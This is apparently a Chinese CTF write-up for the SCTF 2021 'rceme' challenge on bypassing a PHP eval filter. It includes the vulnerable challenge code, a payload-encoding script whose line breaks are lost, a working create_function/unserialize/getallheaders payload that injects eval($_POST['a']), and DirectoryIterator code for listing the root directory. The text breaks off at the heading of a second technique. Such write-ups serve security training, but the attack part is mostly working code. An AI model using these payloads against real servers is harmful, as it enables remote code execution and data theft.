RCE绕过

1.[SCTF 2021]rceme

总结下获取disabled_funciton的方式 

1.phpinfo()

2.var_dump(ini_get(“disable_functions”));

3.var_dump(get_cfg_var(“disable_functions”));

其他的

var_dump(get_cfg_var(“open_basedir”));

var_dump(ini_get_all());

<?php
if(isset($_POST['cmd'])){$code = $_POST['cmd'];if(preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){die('<script>alert(\'Try harder!\');history.back()</script>');}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){@eval($code);die();}
} else {highlight_file(__FILE__);var_dump(ini_get("disable_functions"));
}
?>

剩下符号：().:[]{}*%#@!~ 

 异或脚本 这里用的是取反结合异或[!%FF]

def one(s):ss = ""for each in s:ss += "%" + str(hex(255 - ord(each)))[2:].upper()return f"[~{ss}][!%FF]("
b=1
while b<2:a = input(":>").strip(")")aa = a.split("(")s = ""for each in aa[:-1]:s += one(each)s += ")" * (len(aa) - 1) + ";"b+=1print(s)

 构造payload  

可用通过unserialize和可变参数来传入多个参数

create_funtion本质是语法解析的。可以直接注入eval

create_function(...unserialize(getallheaders()))[~%9C%8D%9A%9E%8B%9A%A0%99%8A%91%9C%8B%96%90%91][!%FF](...[~%8A%91%8C%9A%8D%96%9E%93%96%85%9A][!%FF]([~%9A%91%9B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]())));

http heades 传入一个序列化的参数数组

<?php
$arr=['','}eval($_POST["a"]);//'];
$str=serialize($arr);
echo $str;=> a:2:{i:0;s:0:"";i:1;s:21:"}eval($_POST["a"]);//";}

 通过php原生类DirectoryIterator来读取目录,发现根目录下有flag以及readflag,flag我们没有读取的权限，所以通过执行readflag来获取flag

a=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}

2.环境变量 +linux字符串截取 + 通配符

题目过滤了小写字母，可以通过环境变量绕过